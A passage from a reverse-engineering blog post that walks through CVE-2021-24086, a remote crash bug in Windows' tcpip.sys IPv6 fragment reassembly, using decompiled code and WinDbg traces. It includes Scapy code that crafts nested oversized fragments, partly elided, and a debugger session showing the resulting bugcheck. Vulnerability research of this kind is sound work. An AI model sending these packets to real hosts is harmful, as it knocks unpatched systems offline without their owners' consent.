Here is a small ghetto IPv6 fragmentation function I wrote to ensure I understood things properly; I enjoy learning through practice (Scapy has its own fragment6):

def frag6(target, frag_id, data, nh, frag_size = 1008):
    '''Ghetto fragmentation: split `data` into fragments of at most `frag_size` bytes.'''
    # Every fragment but the last must carry a multiple of 8 bytes because
    # the fragmentation header's offset field counts 8-byte blocks.
    assert (frag_size % 8) == 0
    leftover = data
    offset = 0
    frags = []
    while len(leftover) > 0:
        chunk = leftover[: frag_size]
        leftover = leftover[len(chunk): ]
        last_pkt = len(leftover) == 0
        # m: 0 -> no more fragments / 1 -> more fragments coming
        m = 0 if last_pkt else 1
        # offset is a 13-bit field, so it caps out at 8191
        assert offset <= 8191
        pkt = Ether() \
            / IPv6(dst = target) \
            / IPv6ExtHdrFragment(m = m, nh = nh, id = frag_id, offset = offset) \
            / chunk

        offset += (len(chunk) // 8)
        frags.append(pkt)
    return frags
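
And a quick, hypothetical usage of it, mirroring the earlier snippets (eth1, the link-local multicast destination, and UDP as next header 17 are assumptions carried over from above):

# Hypothetical usage: fragment a UDP datagram (next header 17) into
# MTU-friendly chunks and put them on the wire.
payload = bytes(UDP(sport = 0x1122, dport = 0x3344) / ('a' * 0x1000))
frags = frag6('ff02::1', 0xdeadbeef, payload, nh = 17)
sendp(frags, iface = 'eth1')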

Easy enough. The other important aspect of fragmentation in the literature is related to IPv6 headers and what is called the unfragmentable part of a packet. Here is how Microsoft describes it: "This part consists of the IPv6 header, the Hop-by-Hop Options header, the Destination Options header for intermediate destinations, and the Routing header". It is also the part that precedes the fragmentation header. Obviously, if there is an unfragmentable part, there is a fragmentable part; the fragmentable part is simply what you send behind the fragmentation header. Reassembly is the process of stitching the unfragmentable part together with the reassembled fragmentable part into one beautiful packet. Here is a diagram taken from Understanding the IPv6 Header that sums it up pretty well:

[image: IPv6 fragmentation / reassembly diagram from Understanding the IPv6 Header]
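
To double-check my understanding of the diagram, here is a toy reassembler in Python (conceptual only; it assumes in-order-sortable, non-overlapping fragments with no holes, which the real code obviously cannot):

def reassemble(unfragmentable, fragments):
    '''`fragments` is a list of (offset_in_8_byte_blocks, data) tuples.'''
    fragmentable = bytearray()
    for offset, data in sorted(fragments):
        assert offset * 8 == len(fragmentable), 'hole/overlap in fragments'
        fragmentable += data
    # Reassembled packet = unfragmentable part + stitched fragmentable part.
    return unfragmentable + bytes(fragmentable)

# Two fragments: 8 bytes at block 0, then the tail at block 1.
pkt = reassemble(b'<ipv6 hdr + options>', [(0, b'A' * 8), (1, b'B' * 4)])
assert pkt.endswith(b'A' * 8 + b'B' * 4)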

All of this theoretical information is very useful because we can now look for those details while we reverse-engineer. It is always easier to read code and try to match it against what it is supposed or expected to do.

Theory vs practice: Ipv6pReceiveFragment

At this point, I felt I had accumulated enough new information and it was time to zoom back in on the target. We want to verify that reality works like the literature says it does, and by doing so we will improve our overall understanding. After studying this code for a while, we start to understand the big picture. The function receives a Packet, but as this structure is packet-specific, it is not enough to track the state required to reassemble a packet. That is why another important structure is used for that; I called it Reassembly.

The overall flow is basically broken up into three main parts; again, no need for us to understand every single detail, let's just understand conceptually what it tries to achieve and how:

  • 1 - Figure out if the received fragment is part of an already existing Reassembly (a small Python model of this lookup is sketched right after this list). According to the literature, we know that network stacks should use the source address, the destination address, as well as the fragmentation header's identifier to determine if the current packet is part of a group of fragments. In practice, the function IppReassemblyHashKey hashes those fields together, and the resulting hash is used to index into a hash-table that stores Reassembly structures (Ipv6pFragmentLookup):
int IppReassemblyHashKey(__int64 Iface, int Identification, __int64 Pkt)
{
  //...
  Protocol = *(_QWORD *)(Iface + 40);
  OffsetSrcIp = 12i64;
  AddressLength = *(unsigned __int16 *)(*(_QWORD *)(Protocol + 16) + 6i64);
  if ( Protocol != Ipv4Global )
    OffsetSrcIp = offsetof(ipv6_header_t, src);
  H = RtlCompute37Hash(
        g_37HashSeed,
        Pkt + OffsetSrcIp,
        AddressLength);
  OffsetDstIp = 16i64;
  if ( Protocol != Ipv4Global )
    OffsetDstIp = offsetof(ipv6_header_t, dst);
  H2 = RtlCompute37Hash(H, Pkt + OffsetDstIp, AddressLength);
  return RtlCompute37Hash(H2, &Identification, 4i64) | 0x80000000;
}

Reassembly_t* Ipv6pFragmentLookup(__int64 Iface, int Identification, ipv6_header_t *Pkt, KIRQL *OldIrql)
{
  // ...
  v5 = *(_QWORD *)Iface;
  Context.Signature = 0;
  HashKey = IppReassemblyHashKey(v5, Identification, (__int64)Pkt);
  *OldIrql = KeAcquireSpinLockRaiseToDpc(&Ipp6ReassemblyHashTableLock);
  *(_OWORD *)&Context.ChainHead = 0;
  for ( CurrentReassembly = (Reassembly_t *)RtlLookupEntryHashTable(&Ipp6ReassemblyHashTable, HashKey, &Context);
        ;
        CurrentReassembly = (Reassembly_t *)RtlGetNextEntryHashTable(&Ipp6ReassemblyHashTable, &Context) )
  {
    // If we have walked through all the entries in the hash-table,
    // then we can just bail.
    if ( !CurrentReassembly )
      return 0;
    // If the current entry matches our iface, pkt id, ip src/dst
    // then we found a match!
    if ( CurrentReassembly->Iface == Iface
      && CurrentReassembly->Identification == Identification
      && memcmp(&CurrentReassembly->Ipv6.src.u.Byte[0], &Pkt->src.u.Byte[0], 16) == 0
      && memcmp(&CurrentReassembly->Ipv6.dst.u.Byte[0], &Pkt->dst.u.Byte[0], 16) == 0 )
    {
      break;
    }
  }
  // ...
  return CurrentReassembly;
}
  • 1.1 - If the fragment doesn't belong to any known group, it needs to be put in a newly created Reassembly. This is what IppCreateInReassemblySet does. It's worth noting that this is a point of interest for a reverse-engineer because this is where the Reassembly object gets allocated and constructed (in IppCreateReassembly). It means we can retrieve its size as well as some more information about some of the fields.
Reassembly_t *IppCreateInReassemblySet(
    PKSPIN_LOCK SpinLock, void *Src, __int64 Iface, __int64 Identification, KIRQL NewIrql
)
{
  Reassembly_t *Reassembly = IppCreateReassembly(Src, Iface, Identification);
  if ( Reassembly )
  {
    IppInsertReassembly((__int64)SpinLock, Reassembly);
    KeAcquireSpinLockAtDpcLevel(&Reassembly->Lock);
    KeReleaseSpinLockFromDpcLevel(SpinLock);
  }
  else
  {
    KeReleaseSpinLock(SpinLock, NewIrql);
  }
  return Reassembly;
}

[image: IppCreateReassembly in IDA]
  • 2 - Now that we have a Reassembly structure, the main function wants to figure out where the current fragment fits in the overall reassembled packet. The Reassembly keeps track of fragments using various lists. It uses a ContiguousList that chains fragments that will be contiguous in the reassembled packet. IppReassemblyFindLocation is the function that seems to implement the logic to figure out where the current fragment fits.

  • 2.1 - If IppReassemblyFindLocation returns a pointer to the start of the ContiguousList, it means that the current packet is the first fragment. This is where the function extracts and keeps track of the unfragmentable part of the packet. It is kept in a pool buffer that is referenced in the Reassembly structure.

if ( ReassemblyLocation == &Reassembly->ContiguousStartList )
{
  Reassembly->NextHeader = Fragment->nexthdr;
  UnfragmentableLength = LOWORD(Packet->NetworkLayerHeaderSize) - 48;
  Reassembly->UnfragmentableLength = UnfragmentableLength;
  if ( UnfragmentableLength )
  {
    UnfragmentableData = ExAllocatePoolWithTagPriority(
      (POOL_TYPE)512,
      UnfragmentableLength,
      'erPI',
      LowPoolPriority
    );
    Reassembly->UnfragmentableData = UnfragmentableData;
    if ( !UnfragmentableData )
    {
      // ...
      goto Bail_0;
    }
    // ...
    // Copy the unfragmentable part of the packet inside the pool
    // buffer that we have allocated.
    RtlCopyMdlToBuffer(
      FirstNetBuffer->MdlChain,
      FirstNetBuffer->DataOffset - Packet->NetworkLayerHeaderSize + 0x28,
      Reassembly->UnfragmentableData,
      Reassembly->UnfragmentableLength,
      v51);
    NextHeaderOffset = Packet->NextHeaderPosition;
  }
  Reassembly->NextHeaderOffset = NextHeaderOffset;
  *(_QWORD *)&Reassembly->Ipv6 = *(_QWORD *)Packet->Ipv6Hdr;
}
  • 3 - The fragment is then added into the Reassembly as part of a group of fragments by IppReassemblyInsertFragment. On top of that, if we have received every fragment necessary to start a reassembly, the function Ipv6pReassembleDatagram is invoked. Remember this guy? This is the function that has been patched and that we hit earlier in the post. But this time, we understand how we got there.
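
As promised in step 1, here is a tiny Python model of the fragment-group bookkeeping (a plain dict stands in for Ipp6ReassemblyHashTable; everything here is conceptual and the names are invented for illustration):

# Conceptual model of steps 1 / 1.1 above.
reassembly_set = {}

def lookup_or_create_reassembly(iface, src, dst, identification):
    '''Fragments sharing (iface, src, dst, id) end up in one Reassembly,
    mirroring Ipv6pFragmentLookup / IppCreateInReassemblySet.'''
    key = (iface, src, dst, identification)  # what IppReassemblyHashKey hashes
    if key not in reassembly_set:
        reassembly_set[key] = {
            'unfragmentable': None,  # saved from the first fragment (step 2.1)
            'fragments': [],         # ContiguousList-ish bookkeeping (step 2)
        }
    return reassembly_set[key]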

At this stage we have an OK understanding of the data structures involved in keeping track of groups of fragments and how/when reassembly gets kicked off. We've also commented and refined the various structure fields that we lifted early in the process; this is very helpful because now we can understand the fix for the vulnerability:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  //...
  UnfragmentableLength = Reassembly->UnfragmentableLength;
  TotalLength = UnfragmentableLength + Reassembly->DataLength;
  HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // Below is the added code by the patch
  if ( TotalLength > 0xFFFF ) {
      // Bail
  }

How cool is that? That's really rewarding. Putting in a bunch of work may not feel that useful at the time, but it eventually adds up, snowballs, and really moves the needle forward. It's just a slow process and you gotta get used to it; that's just how the sausage is made.

Let's not get ahead of ourselves though, the emotional rollercoaster is right around the corner :)

Hiding in plain sight

All right - at this point I think we are done with zooming out and understanding the big picture. We understand the beast well enough to get back to this BSoD. After reading Ipv6pReassembleDatagram a few times I honestly couldn't figure out where the advertised crash could happen. Pretty frustrating. That is why I decided instead to use the debugger to modify Reassembly->DataLength and UnfragmentableLength at runtime and see if this could give me any hints. The first one didn't seem to do anything, but the second one bug-checked the machine with a NULL dereference; bingo, that is looking good!

After carefully analyzing the crash, I started to realize that the potential issue had been hiding in plain sight in front of my eyes; here is the code:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  const uint32_t HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // …
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
                                        IppReassemblyNetBufferListsComplete,
                                        Reassembly,
                                        0i64,
                                        0i64,
                                        0,
                                        0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  Buffer = (ipv6_header_t *)NdisGetDataBuffer(FirstNetBuffer, HeaderAndOptionsLength, 0i64, 1u, 0);
  //...
  *Buffer = Reassembly->Ipv6;

NetioAllocateAndReferenceNetBufferAndNetBufferList allocates a brand new NBL called NetBufferList. Then NetioRetreatNetBuffer is called:

NDIS_STATUS NetioRetreatNetBuffer(_NET_BUFFER *Nb, ULONG Amount, ULONG DataBackFill)
{
  const uint32_t CurrentMdlOffset = Nb->CurrentMdlOffset;
  if ( CurrentMdlOffset < Amount )
    return NdisRetreatNetBufferDataStart(Nb, Amount, DataBackFill, NetioAllocateMdl);
  Nb->DataOffset -= Amount;
  Nb->DataLength += Amount;
  Nb->CurrentMdlOffset = CurrentMdlOffset - Amount;
  return 0;
}

Because the FirstNetBuffer just got allocated, it is empty and most of its fields are zero. This means that NetioRetreatNetBuffer triggers a call to NdisRetreatNetBufferDataStart, which is publicly documented. According to the documentation, it should allocate an MDL using NetioAllocateMdl since, as we mentioned above, the network buffer is empty. One thing to notice is that the amount of bytes passed to NetioRetreatNetBuffer, HeaderAndOptionsLength, is truncated to a uint16_t; odd.

  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )

Now that there is backing space in the NB for the IPv6 header as well as the unfragmentable part of the packet, it needs to get a pointer to the backing data in order to populate the buffer. NdisGetDataBuffer is documented as gaining access to a contiguous block of data from a NET_BUFFER structure. After reading the documentation several times and still finding it a little confusing, I figured I'd throw NDIS in IDA and have a look at the implementation:

PVOID NdisGetDataBuffer(PNET_BUFFER NetBuffer, ULONG BytesNeeded, PVOID Storage, UINT AlignMultiple, UINT AlignOffset)
{
  const _MDL *CurrentMdl = NetBuffer->CurrentMdl;
  if ( !BytesNeeded || !CurrentMdl || NetBuffer->DataLength < BytesNeeded )
    return 0i64;
// ...

Just looking at the beginning of the implementation something stands out. As NdisGetDataBuffer is called with HeaderAndOptionsLength (not truncated), we should be able to hit the following condition NetBuffer->DataLength < BytesNeeded when HeaderAndOptionsLength is larger than 0xffff. Why, you ask? Let's take an example. HeaderAndOptionsLength is 0x1337, so NetioRetreatNetBuffer allocates a backing buffer of 0x1337 bytes, and NdisGetDataBuffer returns a pointer to the newly allocated data; works as expected. Now let's imagine that HeaderAndOptionsLength is 0x31337. This means that NetioRetreatNetBuffer allocates 0x1337 (because of the truncation) bytes but calls NdisGetDataBuffer with 0x31337 which makes the call fail because the network buffer is not big enough and we hit this condition NetBuffer->DataLength < BytesNeeded.
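
Reduced to a Python sketch, the mismatch looks like this (both functions are heavily simplified models of the behavior described above, not the real implementations):

# The bug, reduced to arithmetic.
def netio_retreat_net_buffer(nb, amount):
    # Simplified: for a fresh, empty NB this ends up allocating a backing
    # MDL of `amount` bytes via NdisRetreatNetBufferDataStart.
    nb['DataLength'] += amount

def ndis_get_data_buffer(nb, bytes_needed):
    # Simplified: the real function returns NULL in this exact case.
    if bytes_needed == 0 or nb['DataLength'] < bytes_needed:
        return None
    return 'pointer-to-contiguous-data'

nb = {'DataLength': 0}
HeaderAndOptionsLength = 0x10010
netio_retreat_net_buffer(nb, HeaderAndOptionsLength & 0xFFFF)    # only 0x10!
assert ndis_get_data_buffer(nb, HeaderAndOptionsLength) is None  # NULL write ahead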

As the returned pointer is trusted not to be NULL, Ipv6pReassembleDatagram carries on by using it for a memory write:

  *Buffer = Reassembly->Ipv6;

This is where it should bugcheck. As usual we can verify our understanding of the function with a WinDbg session. Here is a simple Python script that sends two fragments:

from scapy.all import *
id = 0xdeadbeef
first = Ether() \
    / IPv6(dst = 'ff02::1') \
    / IPv6ExtHdrFragment(id = id, m = 1, offset = 0) \
    / UDP(sport = 0x1122, dport = 0x3344) \
    / '---frag1'
second = Ether() \
    / IPv6(dst = 'ff02::1') \
    / IPv6ExtHdrFragment(id = id, m = 0, offset = 2) \
    / '---frag2'
sendp([first, second], iface='eth1')

Let's see what the reassembly looks like when those packets are received:

kd> bp tcpip!Ipv6pReassembleDatagram

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff800`117cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> p
tcpip!Ipv6pReassembleDatagram+0x5:
fffff800`117cdd71 48894c2408      mov     qword ptr [rsp+8],rcx

// ...

kd> 
tcpip!Ipv6pReassembleDatagram+0x9c:
fffff800`117cde08 48ff1569660700  call    qword ptr [tcpip!_imp_NetioAllocateAndReferenceNetBufferAndNetBufferList (fffff800`11844478)]

kd> 
tcpip!Ipv6pReassembleDatagram+0xa3:
fffff800`117cde0f 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=ffffc107f7be1d90 <- this is the allocated NBL

kd> !ndiskd.nbl @rax
    NBL                ffffc107f7be1d90    Next NBL           NULL
    First NB           ffffc107f7be1f10    Source             NULL
                                           Pool               ffffc107f58ba980 - NETIO
    Flags              NBL_ALLOCATED

    Walk the NBL chain                     Dump data payload
    Show out-of-band information           Display as Wireshark hex dump


; The first NB is empty; its length is 0 as expected

kd> !ndiskd.nb ffffc107f7be1f10
    NB                 ffffc107f7be1f10    Next NB            NULL
    Length             0                   Source pool        ffffc107f58ba980
    First MDL          0                   DataOffset         0
    Current MDL        [NULL]              Current MDL offset 0

    View associated NBL

// ...

kd> r @rcx, @rdx
rcx=ffffc107f7be1f10 rdx=0000000000000028 <- the first NB and the size to allocate for it

kd>
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff800`117cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff800`11691354)

kd> p
tcpip!Ipv6pReassembleDatagram+0xde:
fffff800`117cde4a 85c0            test    eax,eax

; The first NB now has 0x28 bytes backing MDL

kd> !ndiskd.nb ffffc107f7be1f10
    NB                 ffffc107f7be1f10    Next NB            NULL
    Length             0n40                Source pool        ffffc107f58ba980
    First MDL          ffffc107f5ee8040    DataOffset         0n56
    Current MDL        [First MDL]         Current MDL offset 0n56

    View associated NBL

// ...

; Getting access to the backing buffer

kd> 
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff800`117cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff800`11844178)]

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff800`117cde71 0f1f440000      nop     dword ptr [rax+rax]

; This is the backing buffer; it has leftover data, but gets initialized later

kd> db @rax
ffffc107`f5ee80b0  05 02 00 00 01 00 8f 00-41 dc 00 00 00 01 04 00  ........A.......

All right, so it sounds like we have a plan - let's get to work.

Manufacturing a packet of the death: chasing phantoms

Well... sending a packet with a large header should be trivial, right? That's what I initially thought. After trying various things to achieve this goal, I quickly realized it wouldn't be that easy. The main issue is the MTU. Basically, network devices don't allow you to send packets bigger than ~1200 bytes or so. Online content suggests that some ethernet cards and network switches allow you to bump this limit. Because I was running my tests in my own Hyper-V lab, I figured it was fair enough to try to reproduce the NULL dereference with non-default parameters, so I looked for a way to increase the MTU on the virtual switch to 64k.

The issue with that is that Hyper-V didn't allow me to do it. The only parameter I found let me bump the limit to about 9k, which is very far from the 64k I needed to trigger this issue. At this point I felt frustrated because I was so close to the end, but no cigar. Even though I had read that this vulnerability could be thrown over the internet, I kept going in this wrong direction. If it could be thrown from the internet, it meant it had to go through regular network equipment, and there was no way a 64k packet would make it; but I ignored this hard truth for a bit of time.

Eventually, I accepted the fact that I was probably heading in the wrong direction, ugh. So I reevaluated my options. I figured that the bugcheck I triggered above was not the one I would be able to trigger with packets thrown from the Internet. Maybe, though, there was another code-path with a very similar pattern (retreat + NdisGetDataBuffer) that would result in a bugcheck. I noticed that the TotalLength field is also truncated a bit further down in the function and written into the IPv6 header of the packet. This header is eventually copied into the final reassembled IPv6 header:

// The ROR2 is basically htons.
// One weird thing here is that TotalLength is truncated to 16b.
// We are able to make TotalLength >= 0x10000 by crafting a large
// packet via fragmentation.
// The issue with that is that, the size from the IPv6 header is smaller than
// the real total size. It's kinda hard to see how this would cause subsequent
// issue but hmm, yeah.
Reassembly->Ipv6.length = __ROR2__(TotalLength, 8);
// B00m, Buffer can be NULL here because of the issue discussed above.
// This copies the saved IPv6 header from the first fragment into the
// first part of the reassembled packet.
*Buffer = Reassembly->Ipv6;

My theory was that there might be some code reading this Ipv6.length (which is truncated, as __ROR2__ expects a uint16_t) and that something bad might happen as a result. The length would end up being smaller than the actual total size of the packet; it was hard for me to come up with a scenario where this would cause an issue, but I still chased this theory as it was the only thing I had.
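
As an aside, __ROR2__(TotalLength, 8) is just a 16-bit byte swap, i.e. htons on a little-endian machine; a quick Python check of both the swap and the truncation:

def ror16(x, n):
    '''16-bit rotate right, i.e. what HexRays renders as __ROR2__.'''
    x &= 0xFFFF
    return ((x >> n) | (x << (16 - n))) & 0xFFFF

# Rotating by 8 swaps the two bytes: htons on a little-endian host.
assert ror16(0x1234, 8) == 0x3412
# TotalLength is truncated to 16 bits first, so 0x10010 is stored as a
# (byte-swapped) length of 0x0010 in the reassembled IPv6 header.
assert ror16(0x10010, 8) == 0x1000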

What I did at this point was audit every demuxer that we saw earlier. I looked for ones that would use this length field somehow, and for similar retreat / NdisGetDataBuffer patterns. Nothing. Thinking I might be missing something statically, I also heavily used WinDbg to verify my work. I used hardware breakpoints to track access to those two bytes but got no hit. Ever. Frustrating.

After trying and trying, I started to think that I might be headed in the wrong direction again. Maybe I really needed to find a way to send such a large packet without violating the MTU. But how?

Manufacturing a packet of the death: leap of faith

All right, so I decided to start fresh again. Going back to the big picture, I studied the reassembly algorithm a bit more, diffed again just in case I had missed a clue somewhere, but nothing...

Could I maybe be able to fragment a packet that has a very large header and trick the stack into reassembling the reassembled packet? We've seen previously that we could use reassembly as a primitive to stitch fragments together; so instead of trying to send a very large fragment maybe we could break down a large one into smaller ones and have them stitched together in memory. It honestly felt like a long leap forward, but based on my reverse-engineering effort I didn't really see anything that would prevent that. The idea was blurry but felt like it was worth a shot. How would it really work though?

Sitting down for a minute, this is the theory that I came up with. I would create a very large fragment with many headers; enough to trigger the bug, assuming I could trigger another reassembly. Then, I would fragment this fragment so that it could be sent to the target without violating the MTU.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xff)),
        PadN(optdata=('c'*0xff)),
        PadN(optdata=('d'*0xff)),
        PadN(optdata=('e'*0xff)),
        PadN(optdata=('f'*0xff)),
        PadN(optdata=('0'*0xff)),
    ]) \
    # ....
    / IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xa0)),
    ]) \
    / IPv6ExtHdrFragment(
        id = second_pkt_id, m = 1,
        nh = 17, offset = 0
    ) \
    / UDP(dport = 31337, sport = 31337, chksum=0x7e7f)

reassembled_pkt = bytes(reassembled_pkt)
frags = frag6(args.target, frag_id, reassembled_pkt, 60)

The reassembly happens and tcpip.sys builds this huge reassembled fragment in memory; that's great as I didn't think it would work. Here is what it looks like in WinDbg:

kd> bp tcpip+01ADF71 ".echo Reassembled NB; r @r14;"

kd> g
Reassembled NB
r14=ffff800fa2a46f10
tcpip!Ipv6pReassembleDatagram+0x205:
fffff801`0a7cdf71 41394618        cmp     dword ptr [r14+18h],eax

kd> !ndiskd.nb @r14
    NB                 ffff800fa2a46f10    Next NB            NULL
    Length                10020            Source pool        ffff800fa06ba240
    First MDL          ffff800fa0eb1180    DataOffset         0n56
    Current MDL        [First MDL]         Current MDL offset 0n56

    View associated NBL

kd> !ndiskd.nbl ffff800fa2a46d90
    NBL                ffff800fa2a46d90    Next NBL           NULL
    First NB           ffff800fa2a46f10    Source             NULL
                                           Pool               ffff800fa06ba240 - NETIO
    Flags              NBL_ALLOCATED

    Walk the NBL chain                     Dump data payload
    Show out-of-band information           Display as Wireshark hex dump

kd> !ndiskd.nbl ffff800fa2a46d90 -data
NET_BUFFER ffff800fa2a46f10
  MDL ffff800fa0eb1180
    ffff800fa0eb11f0  60 00 00 00 ff f8 3c 40-fe 80 00 00 00 00 00 00  `·····<@········
    ffff800fa0eb1200  02 15 5d ff fe e4 30 0e-ff 02 00 00 00 00 00 00  ··]···0·········
    ffff800fa0eb1210  00 00 00 00 00 00 00 01                          ········

  ...

  MDL ffff800f9ff5e8b0
    ffff800f9ff5e8f0  3c e1 01 ff 61 61 61 61-61 61 61 61 61 61 61 61  <···aaaaaaaaaaaa
    ffff800f9ff5e900  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e910  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e920  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e930  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e940  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e950  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e960  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa

  ...

  MDL ffff800fa0937280
    ffff800fa09372c0  7a 69 7a 69 00 08 7e 7f                          zizi··~·

What we see above is the reassembled first fragment, built from the Scapy code shown earlier.

It is a fragment that is 0x10020 bytes long (ndiskd prints lengths in hex; decimal values get a 0n prefix), and you can see that the ndiskd extension walks the long MDL chain that describes the content of this fragment. The last MDL is the header of the UDP part of the fragment. What is left to do is to trigger another reassembly. What if we send another fragment that is part of the same group; would this trigger another reassembly?

Well, let's see if the below works I guess:

reassembled_pkt_2 = Ether() \
    / IPv6(dst = args.target) \
    / IPv6ExtHdrFragment(id = second_pkt_id, m = 0, offset = 1, nh = 17) \
    / 'doar-e ftw'

sendp(reassembled_pkt_2, iface = args.iface)

Here is what we see in WinDbg:

kd> bp tcpip!Ipv6pReassembleDatagram

; This is the first reassembly; the output packet is the first large fragment

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff805`4a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

; This is the second reassembly; it combines the first very large fragment, and the second fragment we just sent

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff805`4a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

...

; Let's see the bug happen live!

kd> 
tcpip!Ipv6pReassembleDatagram+0xce:
fffff805`4a5cde3a 0fb79424a8000000 movzx   edx,word ptr [rsp+0A8h]

kd> 
tcpip!Ipv6pReassembleDatagram+0xd6:
fffff805`4a5cde42 498bce          mov     rcx,r14

kd> 
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff805`4a5cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff805`4a491354)

kd> r @edx
edx=10 <- truncated size

// ...

kd> 
tcpip!Ipv6pReassembleDatagram+0xe6:
fffff805`4a5cde52 8b9424a8000000  mov     edx,dword ptr [rsp+0A8h]

kd> 
tcpip!Ipv6pReassembleDatagram+0xed:
fffff805`4a5cde59 41b901000000    mov     r9d,1

kd> 
tcpip!Ipv6pReassembleDatagram+0xf3:
fffff805`4a5cde5f 8364242000      and     dword ptr [rsp+20h],0

kd> 
tcpip!Ipv6pReassembleDatagram+0xf8:
fffff805`4a5cde64 4533c0          xor     r8d,r8d

kd> 
tcpip!Ipv6pReassembleDatagram+0xfb:
fffff805`4a5cde67 498bce          mov     rcx,r14

kd> 
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff805`4a5cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff805`4a644178)]

kd> r @rdx
rdx=0000000000010010 <- non truncated size

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff805`4a5cde71 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=0000000000000000 <- NdisGetDataBuffer returned NULL!!!

kd> g
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
                       (0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805`473c46a0 cc              int     3

kd> kc
 # Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
07 tcpip!Ipv6pReceiveFragment
08 tcpip!Ipv6pReceiveFragmentList
09 tcpip!IppReceiveHeaderBatch
0a tcpip!IppFlcReceivePacketsCore
0b tcpip!IpFlcReceivePackets
0c tcpip!FlpReceiveNonPreValidatedNetBufferListChain
0d tcpip!FlReceiveNetBufferListChainCalloutRoutine
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
10 tcpip!FlReceiveNetBufferListChain
11 NDIS!ndisMIndicateNetBufferListsToOpen
12 NDIS!ndisMTopReceiveNetBufferLists
13 NDIS!ndisCallReceiveHandler
14 NDIS!ndisInvokeNextReceiveHandler
15 NDIS!NdisMIndicateReceiveNetBufferLists
16 netvsc!ReceivePacketMessage
17 netvsc!NvscKmclProcessPacket
18 nt!KiInitializeKernel
19 nt!KiSystemStartup

Incredible! We managed to implement the recursive fragmentation idea we discussed. Wow, I really didn't think it would actually work. Moral of the day: leave no stone unturned, follow your intuitions and reach the state of no unknowns.
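
The crash boils down to an integer truncation: the same stack slot holding the reassembled datagram's size is read once as a 16-bit word (the movzx feeding NetioRetreatNetBuffer) and once as a 32-bit dword (the size passed to NdisGetDataBuffer), and for our 0x10010-byte datagram the two reads disagree, which is why NdisGetDataBuffer ends up returning NULL. A quick Python sanity check of the arithmetic:

size = 0x10010              # actual size of the reassembled datagram
truncated = size & 0xffff   # 16-bit read of the same stack slot
print(hex(truncated))       # 0x10, matches @edx in the trace above
print(hex(size))            # 0x10010, matches @rdx in the trace above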


Conclusion

In this post I tried to take you with me through my journey to write a PoC for CVE-2021-24086, a true remote DoS vulnerability affecting Windows' tcpip.sys driver, found by Microsoft's own @piazzt. From zero to remote BSoD. The PoC is available on my github here: 0vercl0k/CVE-2021-24086.

It was a wild ride mainly because it all looked way too easy and because I ended up chasing a bunch of ghosts.

I am sure that I've lost about 99% of my readers as it is a fairly long and hairy post, but if you made it all the way here you should come hang out in the newly created Diary of a reverse-engineer Discord: https://discord.gg/4JBWKDNyYs. We're trying to build a community of people enjoying low level subjects. Hopefully we can also generate more interest in external contributions :)

Last but not least, special greets to the usual suspects: @yrp604 and @__x86 and @jonathansalwan for proof-reading this article.

Bonus: CVE-2021-24074

